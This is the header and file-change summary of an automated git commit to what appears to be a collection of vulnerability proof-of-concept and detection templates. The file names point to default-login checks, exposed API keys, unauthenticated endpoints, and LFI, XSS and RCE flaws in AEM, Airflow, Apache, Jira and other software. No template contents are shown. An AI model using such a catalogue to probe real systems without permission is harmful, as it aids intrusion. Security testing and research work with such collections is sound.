From e9942e3caba55fdf3ee173495d3bb9a7a62f1410 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sun, 9 Jun 2024 12:33:22 +0000 Subject: [PATCH] 20240609 --- date.txt | 2 +- poc.txt | 3008 +- poc/adobe/adobe-coldfusion-detect-82.yaml | 62 - poc/adobe/adobe-coldfusion-detect-83.yaml | 9 +- .../adobe-coldfusion-error-detect-86.yaml | 29 + ...aml => adobe-coldfusion-error-detect.yaml} | 0 poc/adobe/adobe-component-login-89.yaml | 32 + poc/adobe/adobe-component-login-90.yaml | 31 - poc/adobe/adobe-component-login-91.yaml | 23 + poc/adobe/adobe-component-login-92.yaml | 8 +- ...ml => adobe-connect-central-login-96.yaml} | 0 .../adobe-connect-username-exposure-100.yaml | 27 - .../adobe-connect-username-exposure-101.yaml | 52 +- .../adobe-connect-username-exposure-98.yaml | 3 +- poc/adobe/adobe-connect-version-104.yaml | 32 - ...on-102.yaml => adobe-connect-version.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 33 - .../adobe-experience-manager-login-106.yaml | 23 + .../adobe-experience-manager-login-109.yaml | 10 +- poc/adobe/adobe-media-server-114.yaml | 23 + poc/adobe/adobe-media-server-115.yaml | 11 +- poc/adobe/adobe-media-server.yaml | 30 - poc/adobe/aem-bg-servlet-129.yaml | 29 - poc/adobe/aem-bg-servlet.yaml | 24 + poc/adobe/aem-cached-pages.yaml | 17 +- ....yaml => aem-default-get-servlet-135.yaml} | 0 poc/adobe/aem-default-login-140.yaml | 56 - poc/adobe/aem-default-login-141.yaml | 8 +- poc/adobe/aem-default-login-142.yaml | 12 +- poc/adobe/aem-gql-servlet-149.yaml | 56 - poc/adobe/aem-gql-servlet-150.yaml | 26 + poc/adobe/aem-groovyconsole-154.yaml | 28 - poc/adobe/aem-groovyconsole-155.yaml | 15 +- poc/adobe/aem-jcr-querybuilder-162.yaml | 28 - poc/adobe/aem-jcr-querybuilder-164.yaml | 54 +- poc/adobe/aem-jcr-querybuilder-165.yaml | 31 + poc/adobe/aem-jcr-querybuilder-166.yaml | 7 +- ...tus-169.yaml => aem-login-status-167.yaml} | 0 poc/adobe/aem-merge-metadata-servlet-172.yaml | 10 +- poc/adobe/aem-merge-metadata-servlet-174.yaml | 24 - ...m-querybuilder-internal-path-read-179.yaml | 30 + 
...m-querybuilder-internal-path-read-180.yaml | 24 - .../aem-querybuilder-json-servlet-182.yaml | 72 +- poc/adobe/aem-secrets.yaml | 44 + poc/adobe/aem-setpreferences-xss.yaml | 30 - poc/adobe/aem-userinfo-servlet-192.yaml | 32 - poc/adobe/aem-userinfo-servlet-193.yaml | 25 + poc/adobe/aem-userinfo-servlet.yaml | 10 +- ...ml => aem-xss-childlist-selector-198.yaml} | 0 poc/adobe/aem-xss-childlist-selector.yaml | 37 - poc/adobe/possible-AEM-secrets.yaml | 46 - .../airflow-configuration-exposure-230.yaml | 28 + .../airflow-configuration-exposure.yaml | 16 - poc/airflow/airflow-debug-231.yaml | 26 + poc/airflow/airflow-debug-233.yaml | 29 - poc/airflow/airflow-debug.yaml | 10 +- poc/airflow/airflow-default-login-236.yaml | 21 +- poc/airflow/airflow-detect-239.yaml | 24 - poc/airflow/airflow-detect-240.yaml | 24 + poc/airflow/airflow-panel-242.yaml | 24 + ...-panel-241.yaml => airflow-panel-244.yaml} | 0 poc/airflow/airflow-panel-245.yaml | 13 +- .../unauthenticated-airflow-10884.yaml | 27 + .../unauthenticated-airflow-10886.yaml | 23 - poc/airflow/unauthenticated-airflow.yaml | 12 +- poc/apache/apache-answer-detect.yaml | 45 + poc/apache/apache-apisix-panel-336.yaml | 7 +- poc/apache/apache-apisix-panel-337.yaml | 25 - poc/apache/apache-apisix-panel-338.yaml | 30 + poc/apache/apache-axis-detect-339.yaml | 32 + ...etect.yaml => apache-axis-detect-341.yaml} | 0 poc/apache/apache-cocoon-detect-342.yaml | 33 - poc/apache/apache-cocoon-detect.yaml | 27 + ...che-detect.yaml => apache-detect-346.yaml} | 0 poc/apache/apache-detect-348.yaml | 60 +- poc/apache/apache-flink-unauth-rce-355.yaml | 50 - poc/apache/apache-httpd-rce-362.yaml | 41 - poc/apache/apache-httpd-rce.yaml | 13 +- poc/apache/apache-solr-file-read-368.yaml | 43 + poc/apache/apache-solr-file-read-369.yaml | 50 - poc/apache/apache-solr-log4j-rce-372.yaml | 36 + poc/apache/apache-solr-log4j-rce.yaml | 63 +- poc/apache/apache-storm-unauth.yaml | 13 +- poc/apache/default-apache-test-all-6814.yaml | 4 +- 
poc/apache/default-apache-test-all.yaml | 29 - poc/apache/default-apache-test-page-6816.yaml | 6 +- poc/apache/default-apache-test-page-6818.yaml | 5 +- poc/apache/default-apache2-page-6804.yaml | 8 +- poc/apache/default-apache2-page-6806.yaml | 5 +- .../default-apache2-ubuntu-page-6810.yaml | 6 +- poc/apache/default-apache2-ubuntu-page.yaml | 17 - poc/api/alfacgiapi-wordpress-256.yaml | 62 +- poc/api/alfacgiapi-wordpress.yaml | 33 - poc/api/apache-apisix-panel-336.yaml | 7 +- poc/api/apache-apisix-panel-337.yaml | 25 - poc/api/apache-apisix-panel-338.yaml | 30 + poc/api/api-abstractapi-383.yaml | 25 + ...seipdb-384.yaml => api-abuseipdb-385.yaml} | 0 poc/api/api-abuseipdb.yaml | 31 + poc/api/api-accuweather-386.yaml | 29 - poc/api/api-accuweather.yaml | 23 + poc/api/api-adafruit-io-387.yaml | 30 - poc/api/api-adafruit-io.yaml | 24 + poc/api/api-alienvault-388.yaml | 32 - poc/api/api-apigee-edge-391.yaml | 36 - poc/api/api-apigee-edge.yaml | 29 + poc/api/api-appveyor-392.yaml | 31 - poc/api/api-appveyor.yaml | 25 + poc/api/api-bible-394.yaml | 33 + poc/api/api-bible.yaml | 28 - poc/api/api-bingmaps.yaml | 19 - poc/api/api-bitly-396.yaml | 17 +- poc/api/api-bitrise-397.yaml | 33 + poc/api/api-bitrise.yaml | 28 - poc/api/api-block-400.yaml | 31 - poc/api/api-block.yaml | 26 + poc/api/api-blockchain-399.yaml | 8 +- poc/api/api-blockchain.yaml | 27 - poc/api/api-buildkite-402.yaml | 14 +- poc/api/api-buildkite.yaml | 21 - poc/api/api-buttercms-403.yaml | 22 +- poc/api/api-calendly-404.yaml | 14 +- poc/api/api-circleci-406.yaml | 12 +- poc/api/api-circleci.yaml | 18 - poc/api/api-coinapi-408.yaml | 33 - poc/api/api-coinapi.yaml | 28 + poc/api/api-cooperhewitt-411.yaml | 10 +- poc/api/api-debounce-414.yaml | 30 - poc/api/api-debounce.yaml | 25 + poc/api/api-deviantart-415.yaml | 27 + poc/api/api-deviantart.yaml | 21 - poc/api/api-dribbble-416.yaml | 10 +- ...pi-dribbble.yaml => api-dribbble-417.yaml} | 0 poc/api/api-dropbox-418.yaml | 10 +- poc/api/api-europeana-419.yaml 
| 10 +- poc/api/api-europeana-420.yaml | 21 + poc/api/api-europeana-421.yaml | 12 +- poc/api/api-fastly-424.yaml | 25 + poc/api/{api-fastly.yml => api-fastly.yaml} | 0 poc/api/api-festivo-425.yaml | 31 + poc/api/api-festivo.yaml | 26 - poc/api/api-fortitoken-cloud.yaml | 11 +- poc/api/api-fullhunt-428.yaml | 34 - poc/api/api-fullhunt.yaml | 29 + poc/api/api-google-drive-432.yaml | 28 + poc/api/api-google-drive.yaml | 23 - poc/api/api-hirak-rates-436.yaml | 32 - poc/api/api-hirak-rates.yaml | 27 + poc/api/api-hubspot.yaml | 21 - poc/api/api-iconfinder-439.yaml | 34 + poc/api/api-improvmx-440.yaml | 35 - poc/api/api-improvmx.yaml | 30 + poc/api/api-instagram.yaml | 10 +- poc/api/api-instatus-442.yaml | 34 - poc/api/api-instatus.yaml | 29 + poc/api/api-intercom-443.yaml | 30 + poc/api/api-intercom.yaml | 24 - ...{api-ipstack.yaml => api-ipstack-444.yaml} | 0 poc/api/api-iterable-445.yaml | 23 + poc/api/api-iterable.yaml | 24 - ...-jumpcloud.yaml => api-jumpcloud-446.yaml} | 0 poc/api/api-linkfinder.yaml | 2 +- ...pi-lokalise-452.yaml => api-lokalise.yaml} | 0 poc/api/api-mailchimp-454.yaml | 21 - poc/api/api-mailchimp.yaml | 3 +- poc/api/api-mailgun-455.yaml | 14 +- poc/api/api-malshare-456.yaml | 2 +- poc/api/api-malshare.yaml | 24 + poc/api/api-malwarebazaar-458.yaml | 40 - poc/api/api-malwarebazaar-459.yaml | 12 +- poc/api/api-mapbox-465.yaml | 10 +- poc/api/api-mapbox.yaml | 19 - poc/api/api-mojoauth-466.yaml | 33 - poc/api/api-mojoauth.yaml | 28 + poc/api/api-mywot-467.yaml | 10 +- poc/api/api-mywot-468.yaml | 27 - poc/api/api-netlify-470.yaml | 31 - poc/api/api-netlify.yaml | 25 + poc/api/api-openweather-473.yaml | 13 +- poc/api/api-openweather.yaml | 18 - ...-pagerduty.yaml => api-pagerduty-475.yaml} | 0 poc/api/api-pendo.yaml | 23 + poc/api/api-petfinder-480.yaml | 36 + poc/api/api-petfinder.yaml | 31 - ...acker.yaml => api-pivotaltracker-482.yaml} | 0 poc/api/api-postmark-483.yaml | 26 - poc/api/api-postmark.yaml | 15 +- poc/api/api-rijksmuseum.yaml | 25 - 
poc/api/api-scanii-487.yaml | 10 +- poc/api/api-scanii-488.yaml | 26 + poc/api/api-sendgrid-489.yaml | 23 - poc/api/api-sendgrid.yaml | 11 +- .../{api-slack-493.yaml => api-slack.yaml} | 0 poc/api/api-sonarcloud-494.yaml | 5 +- poc/api/api-sonarcloud.yaml | 21 + poc/api/api-spotify-495.yaml | 31 - poc/api/api-spotify.yaml | 25 + .../{api-square-496.yaml => api-square.yaml} | 0 poc/api/api-sslmate-497.yaml | 33 - poc/api/api-sslmate.yaml | 28 + poc/api/api-stripe-499.yaml | 25 - poc/api/api-stripe.yaml | 13 +- poc/api/api-taiga-501.yaml | 30 - poc/api/api-taiga.yaml | 24 + poc/api/api-thecatapi-502.yaml | 32 - poc/api/api-thecatapi-503.yaml | 10 +- poc/api/api-tink-504.yaml | 31 - poc/api/api-tink.yaml | 25 + poc/api/api-travisci.yaml | 22 - poc/api/api-virustotal-511.yaml | 15 +- poc/api/api-virustotal-512.yaml | 13 +- poc/api/api-visualstudio-513.yaml | 23 - poc/api/api-visualstudio.yaml | 26 + poc/api/api-wakatime-514.yaml | 14 +- poc/api/api-wakatime.yaml | 19 + poc/api/api-weglot-516.yaml | 24 - poc/api/api-weglot.yaml | 1 + poc/api/api-wordcloud-517.yaml | 45 - poc/api/api-wordcloud-518.yaml | 10 +- poc/api/api-youtube-519.yaml | 28 - poc/api/api-youtube.yaml | 22 + poc/api/apiman-panel-460.yaml | 11 +- poc/api/apiman-panel-462.yaml | 30 - poc/api/apisix-default-login-492.yaml | 20 +- poc/api/arcgis-rest-api.yaml | 15 +- poc/api/bems-api-lfi-709.yaml | 25 - poc/api/bems-api-lfi-711.yaml | 22 +- poc/api/bems-api-lfi-712.yaml | 24 - poc/api/burp-api-detect-810.yaml | 28 + poc/api/burp-api-detect-812.yaml | 27 - poc/api/burp-api-detect.yaml | 3 +- poc/api/etcd-unauthenticated-api.yaml | 26 +- poc/api/exposed-docker-api-7299.yaml | 12 +- poc/api/exposed-glances-api-7308.yaml | 56 +- poc/api/fastapi-docs-7398.yaml | 22 + poc/api/fastapi-docs-7399.yaml | 44 +- poc/api/gitlab-api-user-enum-7668.yaml | 7 +- poc/api/gitlab-api-user-enum.yaml | 16 +- poc/api/gmail-api-client-secrets-7741.yaml | 40 - poc/api/google-api-key-7768.yaml | 9 +- 
poc/api/graylog-api-browser-7846.yaml | 22 + poc/api/graylog-api-browser.yaml | 23 - ...cd-unauthenticated-api-data-leak-8056.yaml | 28 - ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + poc/api/kube-api-namespaces-8505.yaml | 25 + poc/api/kube-api-namespaces-8506.yaml | 6 +- poc/api/kube-api-nodes-8507.yaml | 18 +- poc/api/kube-api-nodes-8508.yaml | 25 - poc/api/kube-api-nodes.yaml | 22 - poc/api/kube-api-pods-8510.yaml | 6 +- poc/api/kube-api-pods.yaml | 22 + poc/api/kube-api-services-8513.yaml | 9 +- poc/api/kube-api-services-8514.yaml | 6 +- poc/api/magento-2-exposed-api-8687.yaml | 5 +- poc/api/magento-2-exposed-api-8688.yaml | 45 + poc/api/mailchimp-api-key-8722.yaml | 20 +- poc/api/mailchimp-api-key-8726.yaml | 20 - poc/api/mailchimp-api.yaml | 3 +- ...gun-api-11855.yaml => mailgun-api(1).yaml} | 0 poc/api/pictatic-api-key-9576.yaml | 5 +- poc/api/pictatic-api-key.yaml | 4 - poc/api/sendgrid-api-key-10140.yaml | 2 +- poc/api/sendgrid-api.yaml | 4 + poc/api/slack-api.yaml | 3 +- ...3.yaml => strapi-documentation-10542.yaml} | 0 poc/api/strapi-page-10544.yaml | 3 +- ...trapi-page.yaml => strapi-page-10545.yaml} | 0 poc/api/stripe-api-key(1).yaml | 16 + poc/api/stripe-api-key-11869.yaml | 13 - poc/api/twilio-api-10860.yaml | 13 + poc/api/twilio-api-10861.yaml | 16 - poc/api/twilio-api.yaml | 5 +- poc/api/unauth-spark-api-10963.yaml | 14 +- poc/api/unauth-spark-api.yaml | 30 - poc/api/wadl-api-11082.yaml | 38 - poc/api/wadl-api-11084.yaml | 34 +- poc/api/wadl-api-11085.yaml | 5 - poc/api/wsdl-api-11632.yaml | 18 +- poc/api/wsdl-api-11634.yaml | 15 + poc/api/wso2-apimanager-detect-11638.yaml | 19 - poc/api/yapi-rce-11724.yaml | 27 +- poc/api/yapi-rce-11725.yaml | 86 + poc/atlassian/atlassian-bamboo-panel.yaml | 44 + poc/atlassian/atlassian-crowd-panel-583.yaml | 25 - poc/atlassian/bitbucket-takeover-738.yaml | 21 + poc/atlassian/bitbucket-takeover-739.yaml | 9 +- poc/atlassian/bitbucket-takeover-740.yaml | 21 - poc/atlassian/bitbucket-takeover.yaml | 19 +- 
poc/atlassian/confluence-detect-1186.yaml | 14 +- poc/atlassian/confluence-detect-1187.yaml | 40 - poc/atlassian/confluence-detect-1189.yaml | 41 + .../confluence-ssrf-sharelinks-1191.yaml | 31 +- .../confluence-ssrf-sharelinks-1192.yaml | 44 + .../confluence-ssrf-sharelinks-1193.yaml | 36 - poc/atlassian/jira-detect-8313.yaml | 25 + poc/atlassian/jira-detect-8314.yaml | 29 - poc/atlassian/jira-detect-8316.yaml | 4 + poc/atlassian/jira-login-default.yaml | 8 +- .../jira-unauthenticated-dashboards-8323.yaml | 11 +- .../jira-unauthenticated-dashboards-8327.yaml | 16 +- ...nauthenticated-installed-gadgets-8328.yaml | 4 - ...nauthenticated-installed-gadgets-8330.yaml | 31 + ...-unauthenticated-popular-filters-8331.yaml | 23 - .../jira-unauthenticated-popular-filters.yaml | 5 +- ...nauthenticated-projectcategories-8334.yaml | 7 +- ...ra-unauthenticated-projectcategories.yaml} | 0 ...jira-unauthenticated-user-picker-8341.yaml | 10 +- poc/atlassian/jira_user_piker (copy 1).yaml | 22 + poc/auth/AVTECH-login-bypass.yaml | 2 + poc/auth/Dynatrace-token (copy 1).yaml | 15 - poc/auth/Dynatrace-token.yaml | 6 +- poc/auth/JeeSite-default-login.yaml | 5 +- poc/auth/Mantis-Default_login.yaml | 47 + poc/auth/Redmine-Default-Login.yaml | 21 - ...login-23.yaml => acemanager-login-24.yaml} | 0 poc/auth/activemq-default-login-44.yaml | 33 - poc/auth/activemq-default-login-46.yaml | 3 +- poc/auth/activemq-default-login-48.yaml | 29 + poc/auth/adobe-component-login-89.yaml | 32 + poc/auth/adobe-component-login-90.yaml | 31 - poc/auth/adobe-component-login-91.yaml | 23 + poc/auth/adobe-component-login-92.yaml | 8 +- ...ml => adobe-connect-central-login-96.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 33 - .../adobe-experience-manager-login-106.yaml | 23 + .../adobe-experience-manager-login-109.yaml | 10 +- poc/auth/aem-default-login-140.yaml | 56 - poc/auth/aem-default-login-141.yaml | 8 +- poc/auth/aem-default-login-142.yaml | 12 +- ...tus-169.yaml => aem-login-status-167.yaml} 
| 0 poc/auth/aem-secrets.yaml | 44 + ...aml => aims-password-mgmt-client-219.yaml} | 0 poc/auth/aims-password-mgmt-client-221.yaml | 17 + poc/auth/aims-password-portal-225.yaml | 22 + poc/auth/aims-password-portal.yaml | 2 +- poc/auth/airflow-default-login-236.yaml | 21 +- poc/auth/alibaba-mongoshake-unauth-268.yaml | 27 + poc/auth/alibaba-mongoshake-unauth-270.yaml | 10 +- poc/auth/alphaweb-default-login.yaml | 35 - poc/auth/amazon-mws-auth-token-11845.yaml | 11 +- poc/auth/amazon-mws-auth-token-282.yaml | 6 +- poc/auth/amazon-mws-auth-token-283.yaml | 11 +- poc/auth/ambari-default-login-287.yaml | 35 - poc/auth/ambari-default-login-289.yaml | 35 + poc/auth/ambari-default-login-290.yaml | 11 +- poc/auth/amcrest-login-297.yaml | 11 +- poc/auth/ametys-admin-login-300.yaml | 12 +- poc/auth/ametys-admin-login-301.yaml | 31 - poc/auth/ametys-admin-login-302.yaml | 36 + poc/auth/apache-flink-unauth-rce-355.yaml | 50 - poc/auth/apache-storm-unauth.yaml | 13 +- poc/auth/apc-ups-login.yaml | 24 - poc/auth/api-fortitoken-cloud.yaml | 11 +- poc/auth/api-mojoauth-466.yaml | 33 - poc/auth/api-mojoauth.yaml | 28 + poc/auth/apisix-default-login-492.yaml | 20 +- poc/auth/apollo-default-login-520.yaml | 14 +- ...gin-521.yaml => apollo-default-login.yaml} | 0 poc/auth/apple-app-site-association-524.yaml | 6 +- poc/auth/argocd-login-534.yaml | 35 - ...rgocd-login.yaml => argocd-login-536.yaml} | 0 poc/auth/arl-default-login-537.yaml | 44 - poc/auth/arl-default-login-539.yaml | 7 +- poc/auth/arl-default-login-540.yaml | 9 +- poc/auth/arl-default-password.yaml | 4 + poc/auth/atvise-login.yaml | 29 - poc/auth/authelia-panel.yaml | 33 + poc/auth/avatier-password-management-605.yaml | 37 - ....yaml => avatier_password_management.yaml} | 0 poc/auth/aws-access-key-value-624.yaml | 22 + poc/auth/aws-opensearch-login-649.yaml | 24 + poc/auth/aws-opensearch-login-650.yaml | 25 - poc/auth/aws-opensearch-login.yaml | 3 +- .../axiom-digitalocean-key-exposure-666.yaml | 8 +- ...l => 
axiom-digitalocean-key-exposure.yaml} | 0 poc/auth/azkaban-default-login-674.yaml | 6 +- ...in-673.yaml => azkaban-default-login.yaml} | 0 ...687.yaml => basic-auth-detection-689.yaml} | 0 poc/auth/bazarr-login-702.yaml | 19 + poc/auth/beyondtrust-login-server.yaml | 73 +- ...-726.yaml => bigbluebutton-login-724.yaml} | 0 poc/auth/blue-iris-login-751.yaml | 31 - poc/auth/blue-iris-login-753.yaml | 15 +- poc/auth/blue-iris-login-754.yaml | 22 + poc/auth/braintree-access-token-773.yaml | 4 +- poc/auth/braintree-access-token.yaml | 17 - poc/auth/branch-key-774.yaml | 3 +- ...l => brother-unauthorized-access-793.yaml} | 0 poc/auth/brother-unauthorized-access.yaml | 50 +- poc/auth/canal-default-login-846.yaml | 44 + poc/auth/canal-default-login-848.yaml | 2 +- poc/auth/canal-default-login-849.yaml | 35 - poc/auth/chinaunicom-default-login-906.yaml | 38 - poc/auth/chinaunicom-default-login-908.yaml | 8 +- ...chinaunicom-modem-default-credentials.yaml | 2 - poc/auth/cisco-finesse-login-938.yaml | 22 - poc/auth/cisco-finesse-login-940.yaml | 23 + poc/auth/cisco-integrated-login-941.yaml | 3 +- poc/auth/cisco-systems-login-973.yaml | 25 + poc/auth/cisco-systems-login-975.yaml | 32 - poc/auth/cisco-systems-login.yaml | 12 +- ...-980.yaml => cisco-ucs-kvm-login-979.yaml} | 0 poc/auth/cisco-ucs-kvm-login.yaml | 13 +- poc/auth/clickhouse-unauth-1002.yaml | 25 + poc/auth/clickhouse-unauth-1003.yaml | 26 - poc/auth/clickhouse-unauth-1004.yaml | 8 +- poc/auth/clickhouse-unauth.yaml | 14 +- ...9.yaml => cobbler-default-login-1118.yaml} | 0 poc/auth/cobbler-default-login.yaml | 72 - poc/auth/codian-mcu-login-1139.yaml | 34 - .../coldfusion-administrator-login-1145.yaml | 49 +- .../commax-credentials-disclosure-1158.yaml | 7 +- .../commax-credentials-disclosure-1160.yaml | 36 + poc/auth/cortex-xsoar-login-1225.yaml | 5 +- poc/auth/credential-exposure-1249.yaml | 7 +- poc/auth/credentials-1257.yaml | 16 + poc/auth/credentials-1258.yaml | 16 - poc/auth/credentials-disclosure-1255.yaml 
| 4152 +- poc/auth/credentials-disclosure-1256.yaml | 708 + poc/auth/credentials.yaml | 11 +- poc/auth/crush-ftp-login-1273.yaml | 21 +- poc/auth/crush-ftp-login-1275.yaml | 23 + poc/auth/crush-ftp-login.yaml | 16 +- poc/auth/crushftp-default-login.yaml | 59 + .../cs-cart-unauthenticated-lfi-1284.yaml | 26 + ....yaml => cs-cart-unauthenticated-lfi.yaml} | 0 poc/auth/cs141-default-login-1277.yaml | 13 +- poc/auth/cs141-default-login-1279.yaml | 18 +- poc/auth/cx-cloud-login-6765.yaml | 4 +- poc/auth/dbeaver-credentials-6780.yaml | 42 - poc/auth/dbeaver-credentials-6782.yaml | 11 +- poc/auth/dell-idrac-default-login-6945.yaml | 2 +- ...943.yaml => dell-idrac-default-login.yaml} | 0 poc/auth/dell-idrac9-default-login-6930.yaml | 32 +- poc/auth/dell-idrac9-default-login-6932.yaml | 11 +- poc/auth/dell-openmanager-login-6949.yaml | 27 - poc/auth/dell-openmanager-login-6951.yaml | 23 - poc/auth/dericam-login-6962.yaml | 9 +- poc/auth/dericam-login.yaml | 18 +- poc/auth/dir-850l-login-panel.yaml | 19 +- poc/auth/directadmin-login-panel-7000.yaml | 23 + poc/auth/django-secret-key.yaml | 31 - poc/auth/django-secret.key.yaml | 62 + .../dolphinscheduler-default-login-7072.yaml | 15 +- .../dolphinscheduler-default-login-7073.yaml | 48 + poc/auth/druid-default-login-7096.yaml | 2 +- poc/auth/druid-default-login.yaml | 17 +- ...ml => dubbo-admin-default-login-7120.yaml} | 0 poc/auth/dubbo-admin-default-login-7121.yaml | 18 +- poc/auth/dvwa-default-login-7129.yaml | 7 - ...ogin-7127.yaml => dvwa-default-login.yaml} | 0 .../dvwa-headless-automatic-login-7130.yaml | 42 - .../dvwa-headless-automatic-login-7131.yaml | 42 + .../dvwa-headless-automatic-login-7133.yaml | 9 + poc/auth/dynatrace-token-7145.yaml | 13 + poc/auth/dynatrace-token-7146.yaml | 16 - poc/auth/emcecom-default-login-7211.yaml | 43 - poc/auth/emcecom-default-login-7212.yaml | 7 +- poc/auth/emqx-default-login-7222.yaml | 35 + poc/auth/emqx-default-login.yaml | 5 +- poc/auth/ems-login-panel-7223.yaml | 18 - 
.../enable-secret-for-password-user-and-.yaml | 4 +- poc/auth/epmp-login-7229.yaml | 3 +- poc/auth/epmp-login.yaml | 24 - poc/auth/etcd-keys-7261.yaml | 25 - poc/auth/etcd-keys-7262.yaml | 26 - poc/auth/etcd-keys.yaml | 6 +- poc/auth/etcd-unauthenticated-api.yaml | 26 +- poc/auth/exacqvision-default-login-7275.yaml | 17 +- ...77.yaml => exacqvision-default-login.yaml} | 0 poc/auth/faraday-login-7395.yaml | 24 - poc/auth/faraday-login-7397.yaml | 20 - poc/auth/fatpipe-auth-bypass-7431.yaml | 42 + poc/auth/fatpipe-auth-bypass.yaml | 33 - poc/auth/fcm-server-key.yaml | 14 +- .../fireware-xtm-user-authentication.yaml | 13 +- poc/auth/flir-default-login-7514.yaml | 50 - poc/auth/flir-default-login.yaml | 35 + poc/auth/frp-default-login-7556.yaml | 40 - poc/auth/frp-default-login-7557.yaml | 21 +- poc/auth/ftp-credentials-exposure-7568.yaml | 37 - poc/auth/ftp-credentials-exposure.yaml | 22 + poc/auth/ftp-weak-credentials-7570.yaml | 43 - poc/auth/ftp-weak-credentials.yaml | 23 +- poc/auth/fuelcms-default-login-7571.yaml | 16 +- poc/auth/fuelcms-default-login-7572.yaml | 20 +- poc/auth/general-tokens-7580.yaml | 15 +- poc/auth/general-tokens-7583.yaml | 6 +- poc/auth/git-credentials-disclosure-7641.yaml | 32 + ...0.yaml => git-credentials-disclosure.yaml} | 0 poc/auth/gitea-login.yaml | 13 +- poc/auth/gitlab-public-signup-7683.yaml | 26 - .../gitlab-uninitialized-password-7694.yaml | 11 +- .../gitlab-uninitialized-password-7695.yaml | 10 +- poc/auth/gitlab-weak-login-7707.yaml | 12 +- poc/auth/gitlab-weak-login.yaml | 56 - poc/auth/gloo-unauth-7722.yaml | 13 +- poc/auth/glpi-authentication-7730.yaml | 25 - poc/auth/glpi-default-login-7732.yaml | 15 +- poc/auth/glpi-default-login.yaml | 67 + poc/auth/gmail-api-client-secrets-7741.yaml | 40 - poc/auth/gocd-encryption-key.yaml | 8 +- poc/auth/google-api-key-7768.yaml | 9 +- poc/auth/google-earth-dlogin-7781.yaml | 31 + poc/auth/google-earth-dlogin.yaml | 17 +- ...ebook-secrets.yaml => google-secrets.yaml} | 0 
poc/auth/gophish-default-login-7792.yaml | 14 +- poc/auth/gophish-default-login-7793.yaml | 19 +- poc/auth/gophish-login-7795.yaml | 20 - poc/auth/gophish-login-7796.yaml | 23 + poc/auth/grafana-public-signup-7814.yaml | 30 + poc/auth/grafana-public-signup.yaml | 14 +- poc/auth/guacamole-default-login-7858.yaml | 12 +- poc/auth/guacamole-default-login-7859.yaml | 38 + poc/auth/guacamole-default-login-7861.yaml | 10 +- poc/auth/hivemanager-login-panel-7966.yaml | 3 +- poc/auth/hongdian-default-login-7997.yaml | 58 + poc/auth/hongdian-default-login-7999.yaml | 50 - .../hp-ilo-serial-key-disclosure-8023.yaml | 24 - .../hp-ilo-serial-key-disclosure-8025.yaml | 27 + poc/auth/hp-ilo-serial-key-disclosure.yaml | 7 +- .../hpe-system-management-login-8017.yaml | 27 + poc/auth/hpe-system-management-login.yaml | 13 +- poc/auth/hrsale-unauthenticated-lfi-8039.yaml | 23 +- poc/auth/hrsale-unauthenticated-lfi-8041.yaml | 9 +- poc/auth/htpasswd-detection-8046.yaml | 25 + ...cd-unauthenticated-api-data-leak-8056.yaml | 28 - ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + .../huawei-HG532e-default-router-login.yaml | 38 - ...awei-hg532e-default-router-login-8063.yaml | 9 +- poc/auth/huawei-router-auth-bypass-8073.yaml | 20 +- poc/auth/huawei-router-auth-bypass-8076.yaml | 37 + poc/auth/hue-default-credential-8080.yaml | 16 +- poc/auth/hue-default-credential-8081.yaml | 62 - poc/auth/hue-default-credential.yaml | 62 - ...gin-8110.yaml => ibm-note-login-8112.yaml} | 0 .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- poc/auth/icinga-web-login-8134.yaml | 22 + poc/auth/icinga-web-login-8137.yaml | 23 - poc/auth/icinga-web-login.yaml | 13 +- .../idemia-biometrics-default-login-8138.yaml | 17 +- .../idemia-biometrics-default-login-8139.yaml | 33 - ...idemia-biometrics-default-login-8141.yaml} | 0 poc/auth/iptime-default-login-8193.yaml | 48 - poc/auth/iptime-default-login-8194.yaml | 9 - poc/auth/jellyseerr-login-panel.yaml | 
39 - poc/auth/jenkins-login-8277.yaml | 27 - poc/auth/jenkins-login-8280.yaml | 18 + poc/auth/jfrog-unauth-build-exposed-8299.yaml | 30 + poc/auth/jfrog-unauth-build-exposed-8302.yaml | 8 +- poc/auth/jinher-oa-default-login-8311.yaml | 10 +- poc/auth/jinher-oa-default-login-8312.yaml | 52 + poc/auth/jira-login-default.yaml | 8 +- .../jira-unauthenticated-dashboards-8323.yaml | 11 +- .../jira-unauthenticated-dashboards-8327.yaml | 16 +- ...nauthenticated-installed-gadgets-8328.yaml | 4 - ...nauthenticated-installed-gadgets-8330.yaml | 31 + ...-unauthenticated-popular-filters-8331.yaml | 23 - .../jira-unauthenticated-popular-filters.yaml | 5 +- ...nauthenticated-projectcategories-8334.yaml | 7 +- ...ra-unauthenticated-projectcategories.yaml} | 0 ...jira-unauthenticated-user-picker-8341.yaml | 10 +- poc/auth/jmx-default-login-8355.yaml | 38 - poc/auth/jmx-default-login.yaml | 42 + .../jolokia-unauthenticated-lfi-8366.yaml | 31 + ....yaml => jolokia-unauthenticated-lfi.yaml} | 0 poc/auth/jupyter-ipython-unauth-8402.yaml | 21 - poc/auth/jupyter-ipython-unauth-8405.yaml | 15 +- poc/auth/jupyterhub-default-login-8399.yaml | 10 +- poc/auth/jupyterhub-default-login-8400.yaml | 35 - poc/auth/jwt-token-8408.yaml | 13 +- .../{jwt-token-8410.yaml => jwt-token.yaml} | 0 poc/auth/kafka-center-default-login-8415.yaml | 13 +- poc/auth/kafka-center-default-login.yaml | 42 + poc/auth/kafka-center-login.yaml | 19 +- poc/auth/kasm-login-panel.yaml | 49 + poc/auth/keenetic-web-login-8442.yaml | 19 + poc/auth/keenetic-web-login-8443.yaml | 22 - poc/auth/kenesto-login-8445.yaml | 4 + poc/auth/kentico-login-8446.yaml | 23 - poc/auth/kentico-login.yaml | 22 +- poc/auth/key-cloak-admin-panel.yaml | 4 + ...json-8472.yaml => keycloak-json-8473.yaml} | 0 poc/auth/keycloak-json-8474.yaml | 5 +- poc/auth/keycloak-openid-config-8475.yaml | 39 - poc/auth/keycloak-openid-config.yaml | 25 + poc/auth/keycloak-xss-8481.yaml | 5 +- poc/auth/keycloak-xss-8482.yaml | 9 +- poc/auth/kiwitcms-login-8496.yaml 
